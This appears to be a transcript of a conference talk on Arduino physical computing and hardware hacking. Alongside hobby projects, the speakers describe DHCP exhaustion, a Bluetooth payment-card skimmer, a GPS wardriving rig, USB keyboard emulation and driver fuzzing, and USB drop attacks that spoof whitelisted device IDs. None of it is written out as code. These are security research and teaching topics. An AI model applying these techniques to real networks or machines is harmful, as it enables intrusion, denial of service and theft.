 I'm Philip, also known as Follower, and this is Lee. Physical computing. Who here is familiar with the term? I take that as a note. Physical computing is the idea of taking computing power and taking it away from the box. So instead of having a box with a monitor and a keyboard on the screen, you have some other device that looks different and like this may look slightly more friendly. This is an example of a project called MoMo. MoMo has the ability to tell you where to go. It has a home programmed into it and it finds its way and the way that it directs you is that it tilts its head to point you in the direction that you need to go. This is an example of a physical computing project that is able to create an emotional connection with the people that use it. For example, when was the last time that you saw someone snuggling up to their Garmin GPS device and go, oh, a little LCD, how cute you are. But this is the kind of response that physical computing devices can provoke in people. Does anybody here read hackaday.com? OK, you've probably never heard of the Arduino before then, so I'll give you a little bit of an introduction. This is the Arduino. The Arduino is an example of a project which is designed to help people create physical computing devices. It was originally designed for artists and designers and non-technical users to get into using hardware and electronics. It was developed in Italy by a group of people at a design school and contrary to popular belief, it's not actually named after an Italian emperor, it's named after a pub down the road from where they worked. So, we'll have a look at some other examples of physical computing projects. This is a project called Botanicals. Anybody here have pot plants? Are they dead or alive? So one of the problems that these people were looking at was people have pot plants, but apparently they don't know when to water them. So with a Botanical, you can plug it into the dirt in your pot plant and it will tweet you or send you an SMS message when it needs to be watered. And then when you water it, it will tweet you and say, hey, thanks a lot. Well, you're referring to plants in pots, right? Yeah. Okay, just making sure on that one. Yeah, it probably won't work quite so well in your garden. So, although to be honest, maybe you should try that and find out. Maybe there's a whole new market for it. This is a turn signal jacket. Basically, when you're riding along at night, you want to be able to show people which way you're turning. It has little switches at the end of the sleeves and you basically indicate which way you're going and it will send your lights one way or the other and hopefully people will avoid driving into you. So these are examples of projects where hopefully you'll get the idea that it's no longer about being in a grey box or a black box. It's about taking some input from the world, doing a little bit of processing on it and then taking some result, whether it's lighting a light or sending a text message or moving a servo. So the tools that people are using include the Arduino board I showed at the beginning, but it's also available in a lot of different shapes and sizes. This is the nano, which is a smaller version. The mega, which is a bigger version. And the lily pad, which you saw in the turn signal jacket. So the lily pad is a little bit different but it's designed to be incorporated into clothing and fabric and it's actually connected using conductive thread which apparently originates from fencing. That's the sport, not what people do in New Zealand to keep the sheep in. The project for the Arduino, all the board files are available under an open source licence so people have produced clones like this one, which is called the freeduino. And you can also have bare bones variations as well. So the main chip on the board is a chip from a company called Atmail. You can buy it off the shelf. It's probably kind of $2 to $4 depending on which version you get. And because of that you can start from buying an official board and that's probably kind of $20 to $30. And then when you create a project you can then make a standalone version. So that means that you can have just the microcontroller itself. The Arduino is a really good case study and successful open source hardware project as well as open source software. Despite there being dozens and dozens of different clones of the Arduino, they sell 50,000 a year of the original one, something along those lines. Yeah, they've sold somewhere north of 150,000 units over the last five years. So the Arduino doesn't just consist of the board. It consists of a complete environment. So you've got the board, you've got the development environment which is based on a project called processing. It uses Java for the actual software but what you write in is a subset of C and C++. Don't let the Java scare you. Yeah, you'll never have to touch it. And underneath it is GCC, which I think is really cool because it means that the project's open source sort of all the way down. But also once you learn a little bit at the beginning you can kind of work your way down through the software stack and if you run into limitations going through the easier development environment you can drop down to GCC and assembly if you really wanted to. An example of the code and the language that you use. This is the first sketch, which is what they call a program in the Arduino world. Basically you write, there's two required functions, a setup function that gets run once and a loop function that keeps on running until the power turns off or the end of the world occurs, whichever comes first. So watch out around 2012. You don't want to waste extra battery power if you don't need it. You'll see that it's very similar to C. It's got kind of little bits of JavaScript if you're used to kind of using that. It's a very similar sort of language. You do have to worry eventually about things like types and memory management but certainly starting off and there's heaps of examples that you can use. The other thing that makes the Arduino environment powerful is that there's a lot of third-party library support for it. So that means that a lot of your projects can really take a library from somewhere that deals with one aspect of it and a library from another area and they just pull them together with a little bit of glue code. So you're not limited to just the board itself. There's a whole range of expansion shields that are available. Ethernet gives you a wide Ethernet connection. It has a hard-wired TCPIP stack on a chip and there's basically a sockets-devil interface that's been written to it and then there's another library over top of that which makes it easier to access so you basically can make a call-out and to make a client connection or act as a server as well. It's quite a powerful solution. You can have up to four hardware connections at a time or three hardware connections and as many software connections as you care to implement and it goes down to Mac level access and obviously other protocols you can implement on top. GPS, which will tell you where you are unless you're inside a building in which case it won't. And there's a lot of solutions available. This particular board you can plug different GPS modules in depending on what your requirements are. You can also have cellular connections, sending SMS messages, making data connections and so forth. And also microSD, which gives you the ability to have large amounts of storage. So on the Arduino chip, or the chip used on the Arduino, you've got 32 kilobytes of program storage space and 2K of RAM, so no Windows 7 installed but you can reduce your target a little bit. You can do a lot in that space. One of the projects I'm showing a little bit later is using maybe two-thirds of the available memory and it's a reasonably sophisticated project. So don't let those numbers put you off. It's more like back in the 80s when you could do a lot. Also Wi-Fi modules. This one's called the Wi-Fi board and it can connect over secured and insecure networks, supports up to WPA2 and so forth. So one question you might have is, okay, so if I'm going to get started with this, why should I get started with microcontrollers rather than using, say, an embedded Linux board or a plug computer or something like that? Basically you're going to have a trade-off between three factors. One of them is the cost. You've got the option to buy an official board, which, as I say, is about $20 to $30, or you can buy one of the knock-offs which is kind of somewhat less than that. You might get a more powerful system if you buy, say, a plug computer or something like that, but then you're going to probably be looking at about $100 to start off with and then if you're wanting multiples of them, there's no way to kind of easily get it cheaper. So the main restriction in terms of processing power is that you're not going to be doing video and audio processing. It's going to be more limited. So depending on what your project is that you're wanting to do, you will determine whether or not you want to go for an embedded Linux board or stick with something that's microcontroller-based. So anybody here interested in security? So with any new development, there's new opportunities for doing research into both positive and negative side effects of a new technology or a new use of a technology. Physical computing is no different. It's also part of a concept called the Internet of Things which is basically the idea that you have millions and billions of smart sensors that are connected to the Internet that detect particular states and then report back. But again, because a lot of this stuff is hardwired, then that means that if somebody's making a mistake, then it's there kind of forever. So a lot of the issues that you'll run into are the same sort of things that have been run into traditional computer systems, computer traditional websites, but they're in a hardwired solution. So they're a lot harder to just upgrade. So for example, the Ethernet board I indicated earlier has a hardware TCP-IP stack. So the question is, are there any vulnerabilities in that? And to which I say, you should try and find that out. Basically, I would be surprised if it was a perfect TCP-IP stack because I don't think that's been invented yet. This is a TCP-IP stack that when sending HTTP requests uses a packet per character. Well, to be fair, that's the driver. But yeah, so you've got both the hardware level and the driver level stuff as well. And so, yeah, certainly there's room there to find ways that it could be improved and potentially risks associated with it. So one of the other approaches that you can do is maybe re-implement some old friends and new ways. So one of the projects that I looked at was DHCP exhaustion, which seemed like a reasonably simple project to start with. The WISNET board, which is the wide Ethernet board, allows you to change your MAC address on the fly. And this is the sum total of code, basically, to implement DHCP exhaustion, which is, you know, not really much to it, steer and awe, yeah. Other people have taken other approaches. This is from a payment machine in Canada somewhere. You'll notice just above the S of the word skimming, a little board, that's a Bluetooth board. So basically these people set up a Bluetooth link between the handset for a payment unit and wherever they were, and with skimming cards off the top. And it used to be that if you wanted to get a custom Bluetooth solution, you'd have to have a whole lot more intelligence than just plugging in some wires. But now you too can take these approaches if you'd like. So another popular activity during the 90s, which some of you may remember, was the whole concept of war driving. You'd probably have a laptop and maybe an aerial and the right Wi-Fi card, and eventually you'd get something running. So, oh cool. Now this stack will implement the same sort of thing for you. So, this has got a Wi-Fi board, which does the wireless connections, microSD that does logging, GPS, which detects where you are, and an Arduino board. So, let's have a look at this. Well Lee hopefully gets that working. So basically the motivation with this was to be able to apply power and you probably can't see all the way from back, but this is the actual size unit. Apply power to it. It sits there, waits until it gets a GPS lock and then starts doing a scan for the available networks and then records anything that it finds. Now one of the interesting things that you have working in a cut-down environment like this is that some things that you take for granted aren't actually implemented. So one of the issues I ran into was well how do I keep track of which access points I've already had recorded and which ones I haven't. I considered briefly installing PostgreSQL or something on it, but that apparently hasn't been ported yet. So what has been ported is an SD-FAT library which implements the FAT file system on the SD card. And so by creating a directory path which matched the MAC address of any access point as I accessed it, I could then just check to see if that file existed and how you've got a simple on-disk database of all the access points. So that records it to a file and then carries on. And then potentially this could also serve up the data. But as far as I've modified it so far, it basically records the SD card and then you can pull it off onto your own machine. Are we in luck? Yeah? Yeah. Plus they're a bit harder to fit in your backpack. But yeah, I mean that's totally it's kind of going back to, yeah, like the 70s and 80s where you could actually achieve a lot without a whole lot of support in terms of RAM and so forth. Oh, cool. Okay, so this is basically the result of opening up the logged file and using another project called OpenLayers which does mapping and provides a JavaScript interface and uses OpenStreetMap for the mapping data. And so basically it's recorded whether or not it's an open network a WPA network or a web network with different coloured stars to make it look pretty. And yeah, so that's all produced automatically from the log file once you've got it. Now the interesting thing is that in theory that particular page is being served off a server but in theory, aside from the actual map data the whole page itself could be served off the module as well which then gives you the ability to access it remotely or potentially to have the unit upload the data autonomously so it can just sit in your backpack or sit in a target area. And this was in case the demo didn't work but of course it did. So when it finds it again A, B anybody? It's finding it. So the next topic when we get up to it is software USB. So there's been a few talks already this week both at B sides and I think there's some more coming up today about software or about USB fuzzing and fun stuff that you can do if you can create your own custom USB device. So a lot of those solutions use a hardware USB implementation. There was a guy in Austria that wrote a software USB implementation called VUSB which was previously known as AVR USB and basically this guy apparently in one of Austria's long winter nights sat down and decided that he'd work out how to implement low speed USB in software. So basically that was assembly level hacking, working out individual clock cycles and managed to get this chip which only runs at 16 MHz to actually support low speed USB. So you can implement low speed USB devices. So that's things like keyboards, mice and those sorts of things. Then I came along and thought that was pretty cool that around things but there wasn't a lot documented and there wasn't an easy way to access it from the Arduino environment so I created a Arduino library that wrapped VUSB. So some of the projects that have done keyboard emulation in the past are things like capslocker from a couple of years ago when you plugged a USB device in and it would toggle the capslock key on your victim's computer at random so they think that their keyboard is broken. I implemented an example of that that performed the same technique. Slightly more useful is there's a project called UB key which actually does authentication and it will send in an authentication key when you press a button or something like that which means you don't have to type in something from a two-factor authentication device. So as an example of how you can use the USB side of things this is two parts. The first part is a piece of Python code and it creates uses lib USB in the background to create what's essentially a serial connection to a device and then the USB code on the Arduino is this section and basically it reads whatever's being sent over it. Now I can give you a demo of something here. So this here has an at-mail chip in it which is running in the same way as an Arduino. It's got a switch on the back and a pretty light on the front which isn't doing anything at the moment. When you press the button down it changes into a green light mode which means that when you press the button again it'll type out my domain name which is really impressive when you have a decent internet connection and it actually goes there. The idea is that you can send any keystrokes that you like so that includes things like on a Mac you can do things like make expose or dashboard appear and disappear some of the other projects that have been mentioned and I think are coming up again later today do things like they'll actually send the content of an exploit or something like that. One advantage with this approach is that basically you need the chip and the components and the actual connector yourself so it's really cheap and really easy to get started with as well. There are downsides to it that it doesn't work in every device in fact I've got one laptop where it'll work if you plug it into one USB port on one side but it won't work if you plug it in on the other side but it's still fun to be able to create a USB device and do stuff with it. One of the other projects is software protection dongles I won't demonstrate it now but basically you can have a chunk of python which is encrypted in some way send it out to the device which will then decrypt it and then send it back which is really just an example of how you can have an external device perform some function that won't work if it's not connected. And of course we know how well software protection dongles work in practice. So one of the other aspects is USB fuzzing so this is the idea of finding faults and drivers and hopefully exploiting them for those who don't know how USB works essentially when you plug in a USB device the host says hi, who are you and the device says oh hey I'm this device here and gives a vendor ID and a product ID and how fuzzing work and so normally the host would load the correct driver and things would carry on happy. So what you do with USB fuzzing or at least at the first stage of it is you say oh hi I'm this device oh hi I'm this device oh hi I'm this device and then eventually if you're lucky your operating system will go oh hey I've got a driver with that here let's load it and then because you're not actually that device if the driver is making some assumption about the way that you work it'll dislike it. So the question is does it actually work? Well the answer is yes. So this is a log taken from I think it was a Ubuntu 904 or something like that machine and basically by plugging in the device and pretending to be a particular iPad device, the iPad driver would load and then I think it was a null point to D reference that it encountered. Now the interesting thing about this was that when the crash happened basically no more USB devices will recognise and you had to reboot the machine to actually get USB back and the funny thing was that it could actually still do this even if you were just sitting on the login screen which means there's a whole lot of stuff about well why are you making every single USB driver active at the login screen because you know you're not going to use half of them there but it also means that it creates a greater tax surface because it means that you don't actually have to only have a device that might handle some sort of input, it can be any device because the drivers are potentially going to be loaded already. So there's other people who have done some work on that as well. This is a really sophisticated program that will cause the crash. It sets the vendor ID and the product ID and then it sits there and waits for you to plug it in. So Lee is going to talk a little bit more about the USB fuzzing side of things and what other people have done. So just from this slide here, you got that iPad crash from running through the entire Linux USB device ID database. So basically there's a list of known USB devices and so the code that didn't just exploit it but actually searched for it went through the whole list and tried it out. There's potentially other devices that aren't done on other operating systems. So you could actually just go through the complete key space on that. Sorry about all the AV fail folks. A few other ideas, inspiration about potential ways that this kind of hardware attacks can be used. How about a pocket RFID data collector in the same way as we've implemented. We're driving here potentially you could walk around collecting RFID application tokens or something like that. Much smaller self-contained rig possible than sort of hooking it up to a laptop. Similarly with Bluetooth, with the Bluesmith module follower already mentioned the pin catcher that was built. There's a wide variety of other applications for Bluetooth sniffing possible. So, what are the approaches that you can do as you might go, hey, can I control some sort of mains powered device. And the concept is really appealing, but unfortunately it can also be lethal. So one approach that you can take if you want to control something that's mains powered is you can get these PowerPoint sockets which are remote controlled with an RF remote. And so I gave a demo where you could actually vote during a presentation as to whether you wanted Christmas tree lights on or a fan light on or a lamp on. And it would just send the signal over the RF remote and turn those particular devices on and off. And that didn't require any interaction with mains power at all. Another potential avenue, there's the Arduino project with Android cell phones. So to be able to control your Arduino based hardware project from an Android cell phone, there's a toolkit available. And forward thinking there's who here has heard the term road apple, not in the context of horseshit. So a road apple is a social engineering attack where you drop USB keys or another piece of hardware to the company that you're targeting. And as people tend to do, people are going to plug that thing into their computers when they get into the office. So yeah, exactly. What's on this effect? It can be as simple as including brightshinythings.exe on that road apple. Where you run into issues is a lot of corporations will have USB device IDs and only allow those whitelisted device IDs. Fortunately, you can guess what those whitelisted device IDs are going to be just based on what you know people to be deploying in their corporate networks. And with the functionality of the Arduino USB stack to be able to spoof device IDs, you can potentially pretend to be one of those and present yourself as a mass storage device. Another one that I've been thinking a lot about lately is haptic inputs and outputs. Building covert input devices if you're potentially going into an area where you're not allowed to take notes or record video or whatever, you could potentially use soft switches, soft circuits to build a haptic interface that when you nod your head, record something or when you tap a spot on your sleeve records, records text based on Morse code, something like that. And thinking about that physical way of bypassing things brings me to a brief interlude. Some of you may have seen the T-shirts folks are wearing that say Free Byron on the stickers and the buttons. Check out freebyron.org. Byron is a friend of mine and fellow hackerspace member who is currently being detained in Canada for criticising the security apparatus and security spending around the G20. So if you're interested at all in the right to descent and the right to criticise crappy security infrastructure you should check out freebyron.org. Back to USB fuzzing. I'm going to do a little bit of a summary about the current research and then hand it back over to follower. So in terms of USB sniffing and protocol reversing there's the sort of old and busted USB snoop which is still workable up to Windows XP but doesn't work on Vista or 7. It is useful but produces kind of crappy output. Pi USB is useful for that as well and Nick and Furkin gave a talk on Thursday called Go Go Gadget Python where they did a bunch of protocol analysis on the USB snoop output using Python, so that's definitely worth checking out. There's also a variety of expensive commercial USB sniffers and protocol analysers out there but that's not that interesting. We're talking like couple thousand dollars kind of expensive. Some other folks that are working on this stuff Rafael Dominguez Vega gave a talk last year at Duffcon. He built a pick-based USB fuzzing device Moritz JoeDate has a really interesting presentation covering a bunch of security aspects of USB at a protocol level and has done a bunch of software-based fuzzing that's pretty interesting. So back to last time we switched I promise We're in Vegas I guess you should oh wow there you go that would have been a good bet. So one thing to keep in mind is I was introduced to the Arduino about three years ago and up until that stage I'd had an interest in electronics but never sort of got into it too much there always seemed to be a whole lot of stuff that you had to remember and it was like electricity is like water except when it's not it kind of goes to a pump and I'm like what? But the great thing with the Arduino is it takes what used to be a 100% hardware problem and makes it a 90% software problem and then a 10% hardware problem and that means that if you're familiar with software then you can kind of get a long way with just writing code and then you can look at things like the little pieces of hardware that you actually need to learn and pick up that knowledge as you go. Just the other big step up with the Arduino from previous microcontroller and hardware hacking platforms the sheer amount of yak shaving that is involved in setting up a lot of other microcontroller platforms is a real barrier to entry for a lot of folks with the Arduino you download a zip file install the driver or it's even already installed on Linux and you're ready to go It's also a completely free stack whereas a lot of the other microcontroller environments out there require proprietary and potentially even non-gratis software. Yeah exactly. Potentially non-free as in Libra as well as non-free as in no cost. So then there's another section of things which you can do just because you can. This is an example of one of those things. So you can serve up pretty much anything you like when you're doing a when you're using a wireless or wired shield and so I paid for a while with using Python to generate a flash file and then serve that flash file up from the chip. Now the restriction in that case was this was before there was a good implementations of microSD support and so essentially everything you were serving up had to be served up from your, in those days 16K of RAM and so it turned out that flash was kind of a more efficient way of getting some kind of cool stuff doing. So this is a demo of a demo which has a flash file which is served up and then the little grey lines which you hopefully can see are basically have the ability to return the values of analog pins on the Arduino and so the idea with this is that you don't actually have to install any software to play with it. You can just plug it into your machine, go to the local link IP address and it will pop this up and you can automatically start doing stuff with it and in the background it uses a HTTP rest implementation which basically gives you a URL for each digital pin that you want to turn on and off. That means you can also use things like JavaScript and stuff like that. So there's a couple of other variations of this that people have done out there which gives you kind of the ability to do stuff. So we have one last demo which is VNC. Now one of the distractions is that if you've only got 2K of RAM you can't have a particularly large display space. At least that used to be the case if we bring it together. So here I've got a VNC client and it turns out that the VNC server implementation is actually relatively straightforward. Although I suppose I should really say, man, VNC implementation is really, really difficult and it took a really long time to get this to work. Yeah, the protocol is quite well documented and is something that you can kind of generate as a shield and Arduino fit together and connect. So one of the things that you can keep in mind with this and there we have it. So we have our 255 pixel by 255 pixel screen which our Arduino is serving up complete with a windowed environment and it's currently giving you a reading of the analog pins so those red bars and the numbers represent the current state of the analog pins and because what's known as a floating input it will change as the screen advances. So this is an example of if you're needing to get feedback from a device that you've installed in a location you've got options out there for things like VNC or using a web browser to retrieve that information. And again, there's a lot of cool stuff that's still yet to be done. People are finding out what can be done and people say a few years ago it was like, oh you can't connect a camera to an Arduino and then this camera came out that you could do stuff with. Then it was like, oh you can't attach USB devices like keyboards or cameras to an Arduino because it can't act as a USB host and then a USB host chip was released and somebody created a USB host shield and they're currently working on getting that to do P2P communication with cameras so you can take photographs and stuff like that. So yeah, if it's a field where you like to do things for the first time there's heaps of space there there's heaps of opportunity for doing cool hacks if that's what motivates you I'm sure it doesn't. Thank you. That was in case of VNC demo didn't work. So that pretty much covers the main stuff that we wanted to talk about. We've got a few minutes for any questions or you can talk to us in the Q&A room later. Did you have anything else there? Any questions? Yeah. Cool, thanks for your time and we can see you in the Q&A room. Okay, yeah. Well, when I was so the question is what's the power consumption of the war-driving rig? So this was running off for AA batteries quite happily for quite a long time. And so yeah. Now the other thing is that you can also reduce the size of this quite a bit. These are just using the standard shields. If you wanted to create a custom PCB then you could reduce the size of it probably to maybe you know, kind of half. Yeah, also. Cool. Okay, thanks a lot for your time.